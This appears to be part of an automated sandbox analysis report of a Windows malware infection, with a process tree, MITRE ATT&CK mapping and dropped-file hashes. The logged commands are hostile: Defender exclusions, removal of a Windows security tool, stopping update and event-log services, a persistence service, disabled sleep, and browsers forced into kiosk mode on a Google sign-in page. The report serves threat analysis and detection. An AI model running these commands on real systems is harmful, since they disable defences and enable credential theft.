        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:1532
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        Launches sc.exe
        
        PID:3332
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:7052
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:6904
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:6488
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:4788
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:7112
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "QKJNEQWA"
        8⤵
        Launches sc.exe
        
        PID:6396
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "QKJNEQWA" binpath= "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe" start= "auto"
        8⤵
        Launches sc.exe
        
        PID:1484
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:1116
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "QKJNEQWA"
        8⤵
        Launches sc.exe
        
        PID:5060
    - - C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1240
    - - C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:4524
      - C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1996
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
        7⤵
        
        PID:7140
    - - C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005242001\v_dolg.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 1344
        6⤵
        Program crash
        
        PID:6412
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 1380
        6⤵
        Program crash
        
        PID:6452
    - - C:\Users\Admin\AppData\Local\Temp\1005245001\9b99e21764.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005245001\9b99e21764.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:3192
    - - C:\Users\Admin\AppData\Local\Temp\1005246001\c8684ada8a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1005246001\c8684ada8a.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1868
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1868 -s 1532
        6⤵
        Program crash
        
        PID:6496
- - C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe
    "C:\Users\Admin\AppData\Local\Temp\1011782001\GI59vO6.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5040
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 1472
      4⤵
      Program crash
      PID:6980
- - C:\Users\Admin\AppData\Local\Temp\1011866001\139408cf1c.exe
    "C:\Users\Admin\AppData\Local\Temp\1011866001\139408cf1c.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3460
- - C:\Users\Admin\AppData\Local\Temp\1011867001\80ccf02432.exe
    "C:\Users\Admin\AppData\Local\Temp\1011867001\80ccf02432.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1868
- - C:\Users\Admin\AppData\Local\Temp\1011868001\4e8cfcc349.exe
    "C:\Users\Admin\AppData\Local\Temp\1011868001\4e8cfcc349.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4120
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4120 -s 1528
      4⤵
      Program crash
      PID:4088
- - C:\Users\Admin\AppData\Local\Temp\1011869001\7c5d00adc5.exe
    "C:\Users\Admin\AppData\Local\Temp\1011869001\7c5d00adc5.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3636
- - C:\Users\Admin\AppData\Local\Temp\1011870001\c8684ada8a.exe
    "C:\Users\Admin\AppData\Local\Temp\1011870001\c8684ada8a.exe"
    3⤵
    PID:5368
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      Kills process with taskkill
      PID:5400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      Kills process with taskkill
      PID:5524
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      Kills process with taskkill
      PID:5580
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      Kills process with taskkill
      PID:5636
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      Kills process with taskkill
      PID:5692
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:5748
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        
        PID:5760
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1992 -parentBuildID 20240401114208 -prefsHandle 1908 -prefMapHandle 1900 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bdf8e5ff-2411-47a2-bc36-b0c20fb7db50} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" gpu
        6⤵
        
        PID:5948
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4394ab5-f3cf-4c46-a440-0baa305e8ecd} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" socket
        6⤵
        
        PID:6008
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3248 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3236 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d6924d6-5bfe-43db-831a-09121656fda9} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" tab
        6⤵
        
        PID:1096
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3748 -childID 2 -isForBrowser -prefsHandle 3740 -prefMapHandle 3736 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {83f3722b-0866-495a-b5f7-c9f0e43373e0} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" tab
        6⤵
        
        PID:5216
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4316 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4292 -prefMapHandle 4288 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {072c78e3-2ebd-4bb3-9ed8-b3e15967a0bd} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" utility
        6⤵
        
        PID:6276
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5216 -childID 3 -isForBrowser -prefsHandle 5208 -prefMapHandle 5204 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fa1a1dd-270d-4674-88c6-1f863238318f} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" tab
        6⤵
        
        PID:6836
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5364 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5376 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {530540f0-9817-432d-8b17-c3c6c49bf4ea} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" tab
        6⤵
        
        PID:6848
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 5 -isForBrowser -prefsHandle 5560 -prefMapHandle 5564 -prefsLen 26944 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eddf6e3f-ab50-437b-b1ac-3b45bfb48639} 5760 "\\.\pipe\gecko-crash-server-pipe.5760" tab
        6⤵
        
        PID:6860
- - C:\Users\Admin\AppData\Local\Temp\1011871001\a340910d71.exe
    "C:\Users\Admin\AppData\Local\Temp\1011871001\a340910d71.exe"
    3⤵
    PID:1560
- - C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe
    "C:\Users\Admin\AppData\Local\Temp\1011872001\rhnew.exe"
    3⤵
    PID:1084

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3960

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4768

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
- Executes dropped EXE
PID:1192

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4120 -ip 4120
1⤵
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 456 -ip 456
1⤵
PID:6292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 456 -ip 456
1⤵
PID:6312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1868 -ip 1868
1⤵
PID:6360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5040 -ip 5040
1⤵
PID:6948

C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
1⤵
PID:4944
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3892
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2232
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:5452
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:6164
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1176
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:6536
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4120
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5344
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:6268
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:6484
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:6476
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:6792
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:6780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6800
- - C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
    "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
    3⤵
    PID:5108
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6268
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6208
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:6520
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:6668
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:6148
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3604
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5028
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4388
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2044
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:7024
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5916
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:2928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6152
- - C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe
    "C:\ProgramData\hsbpaqlrqhmp\rzyyvjydedax.exe"
    3⤵
    PID:4772
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:6968
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6496
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2664
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:6204
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:4340
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1376
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7128
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5184
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:5368
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3308
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5636
  - - C:\Windows\system32\cmd.exe
      cmd.exe
      4⤵
      PID:6492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:6928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 7056 -ip 7056
1⤵
PID:728

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
1⤵
PID:4824

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
PID:6532

C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
1⤵
PID:6720

C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
1⤵
PID:5448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
928d36ad618a369ffebf44885d07cf81

SHA1
edf5a353a919c1873af8e6a0dfafa4c38c626975

SHA256
d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

SHA512
4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\OIPZWEW8\download[1].htm

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
6afa0fe3bfeb694a6865a3accaf050bf

SHA1
2fd02dd9174b049a0f930caf557774ee09da1e77

SHA256
d12da8d667f3834e76c4ced8c86985966f3b0fb10b913f99bf02aec8993cd81e

SHA512
ed23c926baeed9a7b5ec62d46fef63a46e847bb82c51aa3585756cef8f1aae8dfe85b274e31256c37ecf98bfeb1d33507ba368296999e3d9ad7ede181657456a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3b4036fb63aca8df16ad51c61dbddf16

SHA1
a738ff6c6a23b1839cdb8fe08e954d94c8554a05

SHA256
7ec6deb8e72e3fad23174ae0c857d98bc34f9a726126f4038b83d6eeb6d135eb

SHA512
7f83a4b8cc3b9effbdd5dea547179119b4f3fb3dd420a71427a24066d09a8c977a5f389b963bbe65dee1f4b1c328a5eb921e0979872683f15fb6ddfd566d302b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
84cfde5cd7e19d8e324e70519d6d24c3

SHA1
1f9aba27c58087bd9ff1401dd083743c4f65da6e

SHA256
8c733907e534f49298cb981d324babdeb71fb172f162eb66e17bc966d3a26f89

SHA512
482accb46c406ee96fbaab3445b3ceceb573939e9206f4f4c4b48ddbfd8008a2542f746591901c0dc5508d83519f171aa7253de4cf063e402524e2479a2db73f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
21KB

MD5
9c7a13dd532103b85623b8e20205094f

SHA1
ea2b4f83386eba7a9ad96dcff4ae9abd64072811

SHA256
4c885d02e2cc2624a62c0b1193963e914ae19aff132a82c078b5ab92810565d8

SHA512
d87dbf83854ac0cc95a0f3d606a71b1102e389f08abe4f000e840470a167458e0bf013131e4d97f3c3ff045e4ff7805ca5be79d0870cbbb508e1278b9b34e9a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
289d25e6e07f2ea6fbbb5cd046b24fda

SHA1
4da79d361bf3696ae936c204347bbbef72ac2843

SHA256
fbdf633584d4c34f5e1c46ee512de54835cd27431c9dd8faf86cd167e674351e

SHA512
8f4ebbee6e177df4e2e5007f720930993dbab8cfa65a608e4cde85a7059fe57c412cd74988ed088b4b3ac8c1243144d02045dc7ed96526c3d276cdfc0533331b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
8cebfc6e1eedd32d0f5d974cf358f9a0

SHA1
99f21a0bbb3af9f243b4462d56cf236be8506e97

SHA256
3f46885b8918ef01ae08745db3c236a558c385173f3e28b64a86c548d838f3ee

SHA512
20ab5a03b04ff692e1fab06fb8310cb71ef4b9fdc2d2c9181e773439439383f62455aed2d7c1e0eec770dce4131950e29836e40c4066c78dd232f34bab5185c5

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\activity-stream.discovery_stream.json

Filesize
24KB

MD5
8eaa689423a66ce036902e41ac57c8a4

SHA1
3cd96ccfa0ed6a14c51cad4ffab091ccb888f2f2

SHA256
97f57649a603329e6e03b3387322b15c4e0a8100d20855b9f0656a5d663e3b27

SHA512
528e9310061e5df07d6807c7c74402c52adfaf9b7aad8100983f34e01da83d8cb4947a510e154c2080b1911869432d4cc1c979d957acae4187863bcc2660c536

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4ws2kncw.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Temp\10000331101\Office2024.exe

Filesize
2.7MB

MD5
